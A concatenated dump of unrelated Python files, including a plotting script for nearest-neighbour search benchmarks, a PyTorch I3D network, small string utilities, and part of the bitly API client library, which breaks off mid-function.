top = (fig_height - top_space) / fig_height
left = left_space / fig_width
right = (fig_width - right_space) / fig_width
plt.subplots_adjust(bottom=bottom, top=top, left=left, right=right,
wspace=width_space, hspace=height_space)
# --------------------------------------------------------------------------
# NH on t (\lambda = 2d)
# --------------------------------------------------------------------------
method = 'NH'
ax = plt.subplot(1, 5, 1)
ax.set_xlabel(r'Recall (%)')
ax.set_ylabel(r'Query Time (ms)')
ax.set_title('Impact of $t$ for %s' % method, fontsize=16)
filename = get_filename(input_folder, dataset, method)
print(filename, method, dataset)
fix_s=2
data = []
for record in parse_res(filename, chosen_top_k):
m = get_m(record)
s = get_s(record)
cand = get_cand(record)
time = get_time(record)
recall = get_recall(record)
if s == fix_s:
data += [[m, s, cand, time, recall]]
data = np.array(data)
legend_name = ['$t=8$', '$t=16$', '$t=32$', '$t=64$', '$t=128$', '$t=256$']
ms = [8, 16, 32, 64, 128, 256]
for color, marker, m in zip(method_colors, method_markers, ms):
data_mp = data[data[:, 0]==m]
        ax.plot(data_mp[:, -1], data_mp[:, -2], marker=marker, c=color,
markerfacecolor='none', markersize=7)
plt.legend(legend_name, loc='upper right', ncol=2, fontsize=13)
plt.xlim(0, 100)
ax.set_yscale('log')
# plt.ylim(1e-2, 1e3) # Yelp
plt.ylim(1e-1, 1e5) # GloVe100
# --------------------------------------------------------------------------
# NH on \lambda (t = 256)
# --------------------------------------------------------------------------
method = 'NH'
ax = plt.subplot(1, 5, 2)
ax.set_xlabel(r'Recall (%)')
    ax.set_title(r'Impact of $\lambda$ for %s' % method, fontsize=16)
filename = get_filename(input_folder, dataset, method)
print(filename, method, dataset)
fix_m=256
data = []
for record in parse_res(filename, chosen_top_k):
m = get_m(record)
s = get_s(record)
cand = get_cand(record)
time = get_time(record)
recall = get_recall(record)
if m == fix_m:
data += [[m, s, cand, time, recall]]
data = np.array(data)
    legend_name = [r'$\lambda=1d$', r'$\lambda=2d$', r'$\lambda=4d$', r'$\lambda=8d$']
ss = [1, 2, 4, 8]
for color, marker, s in zip(method_colors, method_markers, ss):
data_mp = data[data[:, 1]==s]
ax.plot(data_mp[:, -1], data_mp[:, -2], marker=marker, c=color,
markerfacecolor='none', markersize=7)
plt.legend(legend_name, loc='upper right', ncol=2, fontsize=13)
plt.xlim(0, 100)
ax.set_yscale('log')
# plt.ylim(1e-1, 1e2) # Yelp
plt.ylim(1e-1, 1e5) # GloVe100
# --------------------------------------------------------------------------
# FH on m (l = 4 and \lambda = 2d)
# --------------------------------------------------------------------------
method = 'FH'
ax = plt.subplot(1, 5, 3)
ax.set_xlabel(r'Recall (%)')
ax.set_title('Impact of $m$ for %s' % method, fontsize=16)
filename = get_filename(input_folder, dataset, method)
print(filename, method, dataset)
fix_l=4; fix_s=2
data = []
for record in parse_res(filename, chosen_top_k):
m = get_m(record)
l = get_l(record)
s = get_s(record)
cand = get_cand(record)
time = get_time(record)
recall = get_recall(record)
if l == fix_l and s == fix_s:
data += [[m, l, s, cand, time, recall]]
data = np.array(data)
legend_name = ['$m=8$', '$m=16$', '$m=32$', '$m=64$', '$m=128$', '$m=256$']
ms = [8, 16, 32, 64, 128, 256]
for color, marker, m in zip(method_colors, method_markers, ms):
data_mp = data[data[:, 0]==m]
ax.plot(data_mp[:, -1], data_mp[:, -2], marker=marker, c=color,
markerfacecolor='none', markersize=7)
plt.legend(legend_name, loc='upper right', ncol=2, fontsize=13)
plt.xlim(0, 100)
ax.set_yscale('log')
# plt.ylim(1e-2, 1e2) # Yelp
plt.ylim(1e-2, 1e4) # GloVe100
# --------------------------------------------------------------------------
# FH on l (m = 16 and \lambda = 2d)
# --------------------------------------------------------------------------
method = 'FH'
ax = plt.subplot(1, 5, 4)
ax.set_xlabel(r'Recall (%)')
ax.set_title('Impact of $l$ for %s' % method, fontsize=16)
filename = get_filename(input_folder, dataset, method)
print(filename, method, dataset)
fix_m=16; fix_s=2
data = []
for record in parse_res(filename, chosen_top_k):
m = get_m(record)
l = get_l(record)
s = get_s(record)
cand = get_cand(record)
time = get_time(record)
recall = get_recall(record)
if m == fix_m and s == fix_s:
data += [[m, l, s, cand, time, recall]]
data = np.array(data)
legend_name = ['$l=2$', '$l=4$', '$l=6$', '$l=8$', '$l=10$']
ls = [2, 4, 6, 8, 10]
for color, marker, l in zip(method_colors, method_markers, ls):
data_mp = data[data[:, 1]==l]
ax.plot(data_mp[:, -1], data_mp[:, -2], marker=marker, c=color,
markerfacecolor='none', markersize=7)
plt.legend(legend_name, loc='upper right', ncol=2, fontsize=13)
plt.xlim(0, 100)
ax.set_yscale('log')
# plt.ylim(1e-2, 1e2) # Yelp
plt.ylim(1e-2, 1e4) # GloVe100
# --------------------------------------------------------------------------
# FH on \lambda (m = 16 and l = 4)
# --------------------------------------------------------------------------
method = 'FH'
ax = plt.subplot(1, 5, 5)
ax.set_xlabel(r'Recall (%)')
    ax.set_title(r'Impact of $\lambda$ for %s' % method, fontsize=16)
filename = get_filename(input_folder, dataset, method)
print(filename, method, dataset)
fix_m=16; fix_l=4
data = []
for record in parse_res(filename, chosen_top_k):
m = get_m(record)
l = get_l(record)
s = get_s(record)
cand = get_cand(record)
time = get_time(record)
recall = get_recall(record)
if m == fix_m and l == fix_l:
data += [[m, l, s, cand, time, recall]]
data = np.array(data)
    legend_name = [r'$\lambda=1d$', r'$\lambda=2d$', r'$\lambda=4d$', r'$\lambda=8d$']
ss = [1, 2, 4, 8]
for color, marker, s in zip(method_colors, method_markers, ss):
data_mp = data[data[:, 2]==s]
ax.plot(data_mp[:, -1], data_mp[:, -2], marker=marker, c=color,
markerfacecolor='none', markersize=7)
plt.legend(legend_name, loc='upper right', ncol=2, fontsize=13)
plt.xlim(0, 100)
ax.set_yscale('log')
# plt.ylim(1e-2, 1e2) # Yelp
plt.ylim(1e-2, 1e4) # GloVe100
# --------------------------------------------------------------------------
# save and show figure
# --------------------------------------------------------------------------
plt.savefig('%s.png' % join(output_folder, 'params_%s' % dataset))
plt.savefig('%s.eps' % join(output_folder, 'params_%s' % dataset))
plt.savefig('%s.pdf' % join(output_folder, 'params_%s' % dataset))
plt.show()
# ------------------------------------------------------------------------------
if __name__ == '__main__':
chosen_top_k = 10
chosen_top_ks = [1,5,10,20,50,100]
# 1. plot curves of time vs. recall & fraction vs. recall
input_folder = "../results/"
output_folder = "../figures/competitors/"
methods = ['FH', 'FH_Minus', 'NH', 'BH', 'MH', 'Random_Scan', 'Sorted_Scan']
plot_time_fraction_recall(chosen_top_k, methods, input_folder, output_folder)
# 2. plot curves of time vs. index (size and time) & time vs. k
input_folder = "../results/"
output_folder = "../figures/competitors/"
methods = ['FH', 'FH_Minus', 'NH', 'BH', 'MH', 'Random_Scan', 'Sorted_Scan']
size_x_scales = [0.3,0.3,0.3,0.3,0.3]; time_x_scales = [0.1,0.1,0.1,0.3,0.05]
recall_levels = [80,70,60,50]
for recall_level in recall_levels:
plot_time_index_k(chosen_top_k, chosen_top_ks, recall_level, size_x_scales,
time_x_scales, methods, input_folder, output_folder)
# 3. plot curves of time vs. recall & time vs. indexing time
input_folder = "../results/"
output_folder = "../figures/sampling/"
methods = ['FH', 'FH_Minus', 'NH', 'FH_wo_S', 'FH_Minus_wo_S', 'NH_wo_S']
time_x_scales = [0.2, 0.1, 0.1, 0.2, 0.02]
recall_levels = [80,70,60,50]
for recall_level in recall_levels:
plot_time_recall_indextime(chosen_top_k, recall_level, time_x_scales,
methods, input_folder, output_folder)
# 4. plot parameters
chosen_top_k = 10
datasets = ['GloVe100', 'Music', 'Msong', 'Yelp', 'Tiny1M']
input_folder = "../results/"
output_folder = "../figures/param/"
for dataset in datasets:
plot_params(chosen_top_k, dataset, input_folder, output_folder)
# 5. plot curves of time vs. recall & time vs. indexing time for normalized data
input_folder = "../results_normalized/"
output_folder = "../figures/normalized/"
methods = ['FH', 'NH', 'Orig_BH', 'Orig_MH']
recall_level = 50; time_x_scales = [0.1, 0.1, 0.1, 0.05, 0.02]
plot_time_recall_indextime(chosen_top_k, recall_level, time_x_scales, methods,
input_folder, output_folder)
recall_level = 60; time_x_scales = [0.1, 0.1, 0.1, 0.05, 0.02]
plot_time_recall_indextime(chosen_top_k, recall_level, time_x_scales, methods,
input_folder, output_folder)
recall_level = 70; time_x_scales = [0.1, 0.2, 0.1, 0.1, 0.04]
plot_time_recall_indextime(chosen_top_k, recall_level, time_x_scales, methods,
input_folder, output_folder)
recall_level = 80; time_x_scales = [0.1, 0.2, 0.1, 0.1, 0.08]
plot_time_recall_indextime(chosen_top_k, recall_level, time_x_scales, methods,
input_folder, output_folder)
|
157693
|
ONTOLOGY_MINABLE = True
try:
import classifier.classifier as CSO
except Exception:
ONTOLOGY_MINABLE = False
print("No CSO Classifier Present")
from typing import List
from .record import ArxivIdentity,Ontology,ArxivSematicParsedResearch
class OntologyMiner:
is_minable = ONTOLOGY_MINABLE
@staticmethod
def mine_paper(record:ArxivIdentity):
ontology = None
try:
            cso_ontology = CSO.run_cso_classifier({"title": record.title, "abstract": record.abstract})
ontology = Ontology(
mined=True, **cso_ontology
)
except Exception as e:
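            # fall back to an empty, unmined Ontology if the classifier fails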
ontology = Ontology()
return ontology
@staticmethod
def mine_lots_of_papers(records:List[ArxivSematicParsedResearch],workers=1):
ontologies = []
try:
mine_dict = {}
id_dict = {}
for r in records:
                mine_dict[r.identity.identity] = {"title": r.identity.title, "abstract": r.identity.abstract}
id_dict[r.identity.identity] = r
if workers == 1:
cso_ontology = CSO.run_cso_classifier_batch_model_single_worker(mine_dict)
else:
cso_ontology = CSO.run_cso_classifier_batch_mode(mine_dict,workers=workers)
for ontid in cso_ontology:
identity = id_dict[ontid]
ontology = Ontology(
mined=True, **cso_ontology[ontid]
)
ontologies.append(
(identity,ontology)
)
except Exception as e:
print("Exception : ",e)
return []
return ontologies
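# Minimal usage sketch (illustrative; assumes ArxivIdentity records built
# elsewhere by the ingestion pipeline):
#   if OntologyMiner.is_minable:
#       ontology = OntologyMiner.mine_paper(identity)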
|
157755
|
def is_palindrome(line: str) -> bool:
    # a string is a palindrome if it reads the same forwards and backwards
    # (normalize case or strip punctuation here if the task requires it)
    return line == line[::-1]

print(is_palindrome(input().strip()))
|
157759
|
import math
import os
import torch
import numpy as np
## Code taken from https://github.com/hassony2/kinetics_i3d_pytorch/blob/master/src/i3dpt.py
def get_padding_shape(filter_shape, stride, mod=0):
"""Fetch a tuple describing the input padding shape.
NOTES: To replicate "TF SAME" style padding, the padding shape needs to be
determined at runtime to handle cases when the input dimension is not divisible
by the stride.
See https://stackoverflow.com/a/49842071 for explanation of TF SAME padding logic
"""
def _pad_top_bottom(filter_dim, stride_val, mod):
if mod:
pad_along = max(filter_dim - mod, 0)
else:
pad_along = max(filter_dim - stride_val, 0)
pad_top = pad_along // 2
pad_bottom = pad_along - pad_top
return pad_top, pad_bottom
padding_shape = []
for idx, (filter_dim, stride_val) in enumerate(zip(filter_shape, stride)):
depth_mod = (idx == 0) and mod
pad_top, pad_bottom = _pad_top_bottom(filter_dim, stride_val, depth_mod)
padding_shape.append(pad_top)
padding_shape.append(pad_bottom)
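    # move the temporal (first-dimension) padding pair to the end so the tuple
    # matches torch.nn.ConstantPad3d's convention of padding the trailing
    # dimensions first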
depth_top = padding_shape.pop(0)
depth_bottom = padding_shape.pop(0)
padding_shape.append(depth_top)
padding_shape.append(depth_bottom)
return tuple(padding_shape)
def simplify_padding(padding_shapes):
    # returns (True, pad) when all per-side pads are equal, in which case the
    # single int can be passed directly as Conv3d's symmetric padding
    all_same = True
    padding_init = padding_shapes[0]
    for pad in padding_shapes[1:]:
        if pad != padding_init:
            all_same = False
            break
    return all_same, padding_init
class Unit3Dpy(torch.nn.Module):
def __init__(self,
in_channels,
out_channels,
kernel_size=(1, 1, 1),
stride=(1, 1, 1),
activation='relu',
padding='SAME',
use_bias=False,
use_bn=True):
super(Unit3Dpy, self).__init__()
self.padding = padding
self.activation = activation
self.use_bn = use_bn
self.stride = stride
if padding == 'SAME':
padding_shape = get_padding_shape(kernel_size, stride)
simplify_pad, pad_size = simplify_padding(padding_shape)
self.simplify_pad = simplify_pad
if stride[0] > 1:
padding_shapes = [get_padding_shape(kernel_size, stride, mod) for
mod in range(stride[0])]
else:
padding_shapes = [padding_shape]
elif padding == 'VALID':
padding_shape = 0
else:
raise ValueError(
'padding should be in [VALID|SAME] but got {}'.format(padding))
if padding == 'SAME':
if not simplify_pad:
self.pads = [torch.nn.ConstantPad3d(x, 0) for x in padding_shapes]
self.conv3d = torch.nn.Conv3d(
in_channels,
out_channels,
kernel_size,
stride=stride,
bias=use_bias)
else:
self.conv3d = torch.nn.Conv3d(
in_channels,
out_channels,
kernel_size,
stride=stride,
padding=pad_size,
bias=use_bias)
elif padding == 'VALID':
self.conv3d = torch.nn.Conv3d(
in_channels,
out_channels,
kernel_size,
padding=padding_shape,
stride=stride,
bias=use_bias)
else:
raise ValueError(
'padding should be in [VALID|SAME] but got {}'.format(padding))
if self.use_bn:
# This is not strictly the correct map between epsilons in keras and
# pytorch (which have slightly different definitions of the batch norm
# forward pass), but it seems to be good enough. The PyTorch formula
# is described here:
# https://pytorch.org/docs/stable/_modules/torch/nn/modules/batchnorm.html
tf_style_eps = 1E-3
self.batch3d = torch.nn.BatchNorm3d(out_channels, eps=tf_style_eps)
if activation == 'relu':
self.activation = torch.nn.functional.relu
def forward(self, inp):
if self.padding == 'SAME' and self.simplify_pad is False:
# Determine the padding to be applied by examining the input shape
pad_idx = inp.shape[2] % self.stride[0]
pad_op = self.pads[pad_idx]
inp = pad_op(inp)
out = self.conv3d(inp)
if self.use_bn:
out = self.batch3d(out)
if self.activation is not None:
out = torch.nn.functional.relu(out)
return out
class MaxPool3dTFPadding(torch.nn.Module):
def __init__(self, kernel_size, stride=None, padding='SAME'):
super(MaxPool3dTFPadding, self).__init__()
if padding == 'SAME':
padding_shape = get_padding_shape(kernel_size, stride)
self.padding_shape = padding_shape
self.stride = stride
if stride[0] > 1:
padding_shapes = [get_padding_shape(kernel_size, stride, mod) for
mod in range(stride[0])]
else:
padding_shapes = [padding_shape]
self.pads = [torch.nn.ConstantPad3d(x, 0) for x in padding_shapes]
self.pool = torch.nn.MaxPool3d(kernel_size, stride, ceil_mode=True)
def forward(self, inp):
pad_idx = inp.shape[2] % self.stride[0]
pad_op = self.pads[pad_idx]
inp = pad_op(inp)
out = self.pool(inp)
return out
class Mixed(torch.nn.Module):
def __init__(self, in_channels, out_channels):
super(Mixed, self).__init__()
# Branch 0
self.branch_0 = Unit3Dpy(
in_channels, out_channels[0], kernel_size=(1, 1, 1))
# Branch 1
branch_1_conv1 = Unit3Dpy(
in_channels, out_channels[1], kernel_size=(1, 1, 1))
branch_1_conv2 = Unit3Dpy(
out_channels[1], out_channels[2], kernel_size=(3, 3, 3))
self.branch_1 = torch.nn.Sequential(branch_1_conv1, branch_1_conv2)
# Branch 2
branch_2_conv1 = Unit3Dpy(
in_channels, out_channels[3], kernel_size=(1, 1, 1))
branch_2_conv2 = Unit3Dpy(
out_channels[3], out_channels[4], kernel_size=(3, 3, 3))
self.branch_2 = torch.nn.Sequential(branch_2_conv1, branch_2_conv2)
# Branch3
branch_3_pool = MaxPool3dTFPadding(
kernel_size=(3, 3, 3), stride=(1, 1, 1), padding='SAME')
branch_3_conv2 = Unit3Dpy(
in_channels, out_channels[5], kernel_size=(1, 1, 1))
self.branch_3 = torch.nn.Sequential(branch_3_pool, branch_3_conv2)
def forward(self, inp):
out_0 = self.branch_0(inp)
out_1 = self.branch_1(inp)
out_2 = self.branch_2(inp)
out_3 = self.branch_3(inp)
out = torch.cat((out_0, out_1, out_2, out_3), 1)
return out
class I3D(torch.nn.Module):
def __init__(self,
num_classes,
modality='rgb',
dropout_prob=0,
name='inception'):
super(I3D, self).__init__()
self.name = name
self.num_classes = num_classes
if modality == 'rgb':
in_channels = 3
elif modality == 'flow':
in_channels = 2
else:
raise ValueError(
'{} not among known modalities [rgb|flow]'.format(modality))
self.modality = modality
conv3d_1a_7x7 = Unit3Dpy(
out_channels=64,
in_channels=in_channels,
kernel_size=(7, 7, 7),
stride=(2, 2, 2),
padding='SAME')
# 1st conv-pool
self.conv3d_1a_7x7 = conv3d_1a_7x7
self.maxPool3d_2a_3x3 = MaxPool3dTFPadding(
kernel_size=(1, 3, 3), stride=(1, 2, 2), padding='SAME')
# conv conv
conv3d_2b_1x1 = Unit3Dpy(
out_channels=64,
in_channels=64,
kernel_size=(1, 1, 1),
padding='SAME')
self.conv3d_2b_1x1 = conv3d_2b_1x1
conv3d_2c_3x3 = Unit3Dpy(
out_channels=192,
in_channels=64,
kernel_size=(3, 3, 3),
padding='SAME')
self.conv3d_2c_3x3 = conv3d_2c_3x3
self.maxPool3d_3a_3x3 = MaxPool3dTFPadding(
kernel_size=(1, 3, 3), stride=(1, 2, 2), padding='SAME')
# Mixed_3b
self.mixed_3b = Mixed(192, [64, 96, 128, 16, 32, 32])
self.mixed_3c = Mixed(256, [128, 128, 192, 32, 96, 64])
self.maxPool3d_4a_3x3 = MaxPool3dTFPadding(
kernel_size=(3, 3, 3), stride=(2, 2, 2), padding='SAME')
# Mixed 4
self.mixed_4b = Mixed(480, [192, 96, 208, 16, 48, 64])
self.mixed_4c = Mixed(512, [160, 112, 224, 24, 64, 64])
self.mixed_4d = Mixed(512, [128, 128, 256, 24, 64, 64])
self.mixed_4e = Mixed(512, [112, 144, 288, 32, 64, 64])
self.mixed_4f = Mixed(528, [256, 160, 320, 32, 128, 128])
self.maxPool3d_5a_2x2 = MaxPool3dTFPadding(
kernel_size=(2, 2, 2), stride=(2, 2, 2), padding='SAME')
# Mixed 5
self.mixed_5b = Mixed(832, [256, 160, 320, 32, 128, 128])
self.mixed_5c = Mixed(832, [384, 192, 384, 48, 128, 128])
self.avg_pool = torch.nn.AvgPool3d((2, 7, 7), (1, 1, 1))
self.dropout = torch.nn.Dropout(dropout_prob)
self.conv3d_0c_1x1 = Unit3Dpy(
in_channels=1024,
out_channels=self.num_classes,
kernel_size=(1, 1, 1),
activation=None,
use_bias=True,
use_bn=False)
self.softmax = torch.nn.Softmax(1)
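        # freeze all parameters: gradients are never computed for this copy of
        # I3D (e.g. when it is used as a fixed feature extractor)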
for param in self.parameters():
param.requires_grad = False
def forward(self, inp):
# Preprocessing
out = self.conv3d_1a_7x7(inp)
out = self.maxPool3d_2a_3x3(out)
out = self.conv3d_2b_1x1(out)
out = self.conv3d_2c_3x3(out)
out = self.maxPool3d_3a_3x3(out)
out = self.mixed_3b(out)
out = self.mixed_3c(out)
out = self.maxPool3d_4a_3x3(out)
out = self.mixed_4b(out)
out = self.mixed_4c(out)
out = self.mixed_4d(out)
out = self.mixed_4e(out)
out = self.mixed_4f(out)
out = self.maxPool3d_5a_2x2(out)
out = self.mixed_5b(out)
out = self.mixed_5c(out)
out = self.avg_pool(out)
out = self.dropout(out)
out = self.conv3d_0c_1x1(out)
out = out.squeeze(3)
out = out.squeeze(3)
out = out.mean(2)
out_logits = out
out = self.softmax(out_logits)
return out, out_logits
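# Minimal smoke test (an illustrative sketch: 400 classes and a 16-frame
# 224x224 RGB clip are assumptions, matching common Kinetics-style usage):
if __name__ == '__main__':
    model = I3D(num_classes=400, modality='rgb')
    model.eval()
    clip = torch.randn(1, 3, 16, 224, 224)  # (batch, channels, frames, h, w)
    with torch.no_grad():
        probs, logits = model(clip)
    print(probs.shape)  # expected: torch.Size([1, 400])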
|
157765
|
line = input()
# build an abbreviation from a hyphen-separated phrase: the first character
# plus the character following each hyphen (range stops one short so a
# trailing hyphen cannot trigger an index error)
abbr = line[0]
for i in range(len(line) - 1):
    if line[i] == "-":
        abbr += line[i + 1]
print(abbr)
|
157777
|
import hashlib
import json
import sys
import time
import types
import warnings
try:
from urllib.request import build_opener, HTTPRedirectHandler
from urllib.parse import urlencode
from urllib.error import URLError, HTTPError
string_types = str,
integer_types = int,
numeric_types = (int, float)
text_type = str
binary_type = bytes
except ImportError as e:
from urllib2 import build_opener, HTTPRedirectHandler, URLError, HTTPError
from urllib import urlencode
string_types = basestring,
integer_types = (int, long)
numeric_types = (int, long, float)
text_type = unicode
binary_type = str
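# the try/except above selects between the Python 3 (urllib.*) and Python 2
# (urllib2/urllib) imports and aliases the type names that differ between the
# two versions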
class DontRedirect(HTTPRedirectHandler):
def redirect_response(self, req, fp, code, msg, headers, newurl):
if code in (301, 302, 303, 307):
raise HTTPError(req.get_full_url(), code, msg, headers, fp)
class Error(Exception):
pass
class BitlyError(Error):
def __init__(self, code, message):
Error.__init__(self, message)
self.code = code
def _utf8(s):
if isinstance(s, text_type):
s = s.encode('utf-8')
assert isinstance(s, binary_type)
return s
def _utf8_params(params):
"""encode a dictionary of URL parameters (including iterables) as utf-8"""
assert isinstance(params, dict)
encoded_params = []
for k, v in params.items():
if v is None:
continue
if isinstance(v, numeric_types):
v = str(v)
if isinstance(v, (list, tuple)):
v = [_utf8(x) for x in v]
else:
v = _utf8(v)
encoded_params.append((k, v))
return dict(encoded_params)
class Connection(object):
"""
This is a python library for accessing the bitly api
http://github.com/bitly/bitly-api-python
Usage:
import bitly_api
c = bitly_api.Connection('bitlyapidemo','R_{{apikey}}')
# or to use oauth2 endpoints
c = bitly_api.Connection(access_token='...')
c.shorten('http://www.google.com/')
"""
def __init__(self, login=None, api_key=None, access_token=None,
secret=None):
self.host = 'api.bit.ly'
self.ssl_host = 'api-ssl.bit.ly'
self.login = login
self.api_key = api_key
self.access_token = access_token
self.secret = secret
(major, minor, micro, releaselevel, serial) = sys.version_info
parts = (major, minor, micro, '?')
self.user_agent = "Python/%d.%d.%d bitly_api/%s" % parts
def shorten(self, uri, x_login=None, x_apiKey=None, preferred_domain=None):
""" creates a bitly link for a given long url
@parameter uri: long url to shorten
@parameter x_login: login of a user to shorten on behalf of
@parameter x_apiKey: apiKey of a user to shorten on behalf of
@parameter preferred_domain: bit.ly[default], bitly.com, or j.mp
"""
params = dict(uri=uri)
if preferred_domain:
params['domain'] = preferred_domain
if x_login:
params.update({
'x_login': x_login,
'x_apiKey': x_apiKey})
data = self._call(self.host, 'v3/shorten', params, self.secret)
return data['data']
def expand(self, hash=None, shortUrl=None, link=None):
""" given a bitly url or hash, decode it and return the target url
@parameter hash: one or more bitly hashes
@parameter shortUrl: one or more bitly short urls
@parameter link: one or more bitly short urls (preferred vocabulary)
"""
if link and not shortUrl:
shortUrl = link
if not hash and not shortUrl:
raise BitlyError(500, 'MISSING_ARG_SHORTURL')
params = dict()
if hash:
params['hash'] = hash
if shortUrl:
params['shortUrl'] = shortUrl
data = self._call(self.host, 'v3/expand', params, self.secret)
return data['data']['expand']
def clicks(self, hash=None, shortUrl=None):
"""
given a bitly url or hash, get statistics about the clicks on that link
"""
warnings.warn("/v3/clicks is depricated in favor of /v3/link/clicks",
DeprecationWarning)
if not hash and not shortUrl:
raise BitlyError(500, 'MISSING_ARG_SHORTURL')
params = dict()
if hash:
params['hash'] = hash
if shortUrl:
params['shortUrl'] = shortUrl
data = self._call(self.host, 'v3/clicks', params, self.secret)
return data['data']['clicks']
def referrers(self, hash=None, shortUrl=None):
"""
given a bitly url or hash, get statistics about the referrers of that
link
"""
warnings.warn("/v3/referrers is depricated in favor of "
"/v3/link/referrers", DeprecationWarning)
if not hash and not shortUrl:
raise BitlyError(500, 'MISSING_ARG_SHORTURL')
params = dict()
if hash:
params['hash'] = hash
if shortUrl:
params['shortUrl'] = shortUrl
data = self._call(self.host, 'v3/referrers', params, self.secret)
return data['data']['referrers']
def clicks_by_day(self, hash=None, shortUrl=None):
""" given a bitly url or hash, get a time series of clicks
per day for the last 30 days in reverse chronological order
(most recent to least recent) """
warnings.warn("/v3/clicks_by_day is depricated in favor of "
"/v3/link/clicks?unit=day", DeprecationWarning)
if not hash and not shortUrl:
raise BitlyError(500, 'MISSING_ARG_SHORTURL')
params = dict()
if hash:
params['hash'] = hash
if shortUrl:
params['shortUrl'] = shortUrl
data = self._call(self.host, 'v3/clicks_by_day', params, self.secret)
return data['data']['clicks_by_day']
def clicks_by_minute(self, hash=None, shortUrl=None):
""" given a bitly url or hash, get a time series of clicks
per minute for the last 30 minutes in reverse chronological
order (most recent to least recent)"""
warnings.warn("/v3/clicks_by_minute is depricated in favor of "
"/v3/link/clicks?unit=minute", DeprecationWarning)
if not hash and not shortUrl:
raise BitlyError(500, 'MISSING_ARG_SHORTURL')
params = dict()
if hash:
params['hash'] = hash
if shortUrl:
params['shortUrl'] = shortUrl
data = self._call(self.host, 'v3/clicks_by_minute', params,
self.secret)
return data['data']['clicks_by_minute']
def link_clicks(self, link, **kwargs):
params = dict(link=link)
data = self._call_oauth2_metrics("v3/link/clicks", params, **kwargs)
return data["link_clicks"]
def link_encoders(self, link, **kwargs):
"""return the bitly encoders who have saved this link"""
params = dict(link=link)
data = self._call(self.host, 'v3/link/encoders', params, **kwargs)
return data['data']
def link_encoders_count(self, link, **kwargs):
"""return the count of bitly encoders who have saved this link"""
params = dict(link=link)
data = self._call(self.host, 'v3/link/encoders_count', params,
**kwargs)
return data['data']
def link_referring_domains(self, link, **kwargs):
"""
returns the domains that are referring traffic to a single bitly link
"""
params = dict(link=link)
data = self._call_oauth2_metrics("v3/link/referring_domains", params,
**kwargs)
return data["referring_domains"]
def link_referrers_by_domain(self, link, **kwargs):
"""
returns the pages that are referring traffic to a single bitly link,
grouped by domain
"""
params = dict(link=link)
data = self._call_oauth2_metrics("v3/link/referrers_by_domain", params,
**kwargs)
return data["referrers"]
def link_referrers(self, link, **kwargs):
"""
        returns the pages that are referring traffic to a single bitly link
"""
params = dict(link=link)
data = self._call_oauth2_metrics("v3/link/referrers", params, **kwargs)
return data["referrers"]
def link_shares(self, link, **kwargs):
"""return number of shares of a bitly link"""
params = dict(link=link)
data = self._call_oauth2_metrics("v3/link/shares", params, **kwargs)
return data
def link_countries(self, link, **kwargs):
params = dict(link=link)
data = self._call_oauth2_metrics("v3/link/countries", params, **kwargs)
return data["countries"]
def user_clicks(self, **kwargs):
"""aggregate number of clicks on all of this user's bitly links"""
data = self._call_oauth2_metrics('v3/user/clicks', dict(), **kwargs)
return data
def user_countries(self, **kwargs):
"""
aggregate metrics about countries from which people are clicking on all
of a user's bitly links
"""
data = self._call_oauth2_metrics('v3/user/countries', dict(), **kwargs)
return data["countries"]
def user_popular_links(self, **kwargs):
data = self._call_oauth2_metrics("v3/user/popular_links", dict(),
**kwargs)
return data["popular_links"]
def user_referrers(self, **kwargs):
"""
aggregate metrics about the referrers for all of the authed user's
bitly links
"""
data = self._call_oauth2_metrics("v3/user/referrers", dict(), **kwargs)
return data["referrers"]
def user_referring_domains(self, **kwargs):
"""
aggregate metrics about the domains referring traffic to all of the
authed user's bitly links
"""
data = self._call_oauth2_metrics("v3/user/referring_domains", dict(),
**kwargs)
return data["referring_domains"]
def user_share_counts(self, **kwargs):
"""number of shares by authed user in given time period"""
data = self._call_oauth2_metrics("v3/user/share_counts", dict(),
**kwargs)
return data["share_counts"]
def user_share_counts_by_share_type(self, **kwargs):
"""
number of shares by authed user broken down by type (facebook, twitter,
email) in a give time period
"""
data = self._call_oauth2_metrics("v3/user/share_counts_by_share_type",
dict(), **kwargs)
return data["share_counts_by_share_type"]
def user_shorten_counts(self, **kwargs):
data = self._call_oauth2_metrics("v3/user/shorten_counts", dict(),
**kwargs)
return data["user_shorten_counts"]
def user_tracking_domain_list(self):
data = self._call_oauth2("v3/user/tracking_domain_list", dict())
return data["tracking_domains"]
def user_tracking_domain_clicks(self, domain, **kwargs):
params = dict(domain=domain)
data = self._call_oauth2_metrics("v3/user/tracking_domain_clicks",
params, **kwargs)
return data["tracking_domain_clicks"]
def user_tracking_domain_shorten_counts(self, domain, **kwargs):
params = dict(domain=domain)
data = self._call_oauth2_metrics(
"v3/user/tracking_domain_shorten_counts", params, **kwargs)
return data["tracking_domain_shorten_counts"]
def user_info(self, **kwargs):
"""return or update info about a user"""
data = self._call_oauth2("v3/user/info", kwargs)
return data
def user_link_history(self, created_before=None, created_after=None,
archived=None, limit=None, offset=None,
private=None):
params = dict()
        if created_before is not None:
            assert isinstance(created_before, integer_types)
            params["created_before"] = created_before
        if created_after is not None:
            assert isinstance(created_after, integer_types)
            params["created_after"] = created_after
        if archived is not None:
            assert isinstance(archived, string_types)
            archived = archived.lower()
            assert archived in ("on", "off", "both")
            params["archived"] = archived
        if private is not None:
            assert isinstance(private, string_types)
            private = private.lower()
            assert private in ("on", "off", "both")
            params["private"] = private
if limit is not None:
assert isinstance(limit, integer_types)
params["limit"] = str(limit)
if offset is not None:
assert isinstance(offset, integer_types)
params["offset"] = str(offset)
data = self._call_oauth2("v3/user/link_history", params)
return data["link_history"]
def user_network_history(self, offset=None, expand_client_id=False,
limit=None, expand_user=False):
params = dict()
if expand_client_id is True:
params["expand_client_id"] = "true"
if expand_user is True:
params["expand_user"] = "true"
if offset is not None:
assert isinstance(offset, integer_types)
params["offset"] = str(offset)
if limit is not None:
assert isinstance(limit, integer_types)
params["limit"] = str(limit)
data = self._call_oauth2("v3/user/network_history", params)
return data
def info(self, hash=None, shortUrl=None, link=None):
""" return the page title for a given bitly link """
if link and not shortUrl:
shortUrl = link
if not hash and not shortUrl:
raise BitlyError(500, 'MISSING_ARG_SHORTURL')
params = dict()
if hash:
params['hash'] = hash
if shortUrl:
params['shortUrl'] = shortUrl
data = self._call(self.host, 'v3/info', params, self.secret)
return data['data']['info']
def link_lookup(self, url):
"""query for a bitly link based on a long url (or list of long urls)"""
params = dict(url=url)
data = self._call(self.host, 'v3/link/lookup', params, self.secret)
return data['data']['link_lookup']
def lookup(self, url):
""" query for a bitly link based on a long url """
warnings.warn("/v3/lookup is depricated in favor of /v3/link/lookup",
DeprecationWarning)
params = dict(url=url)
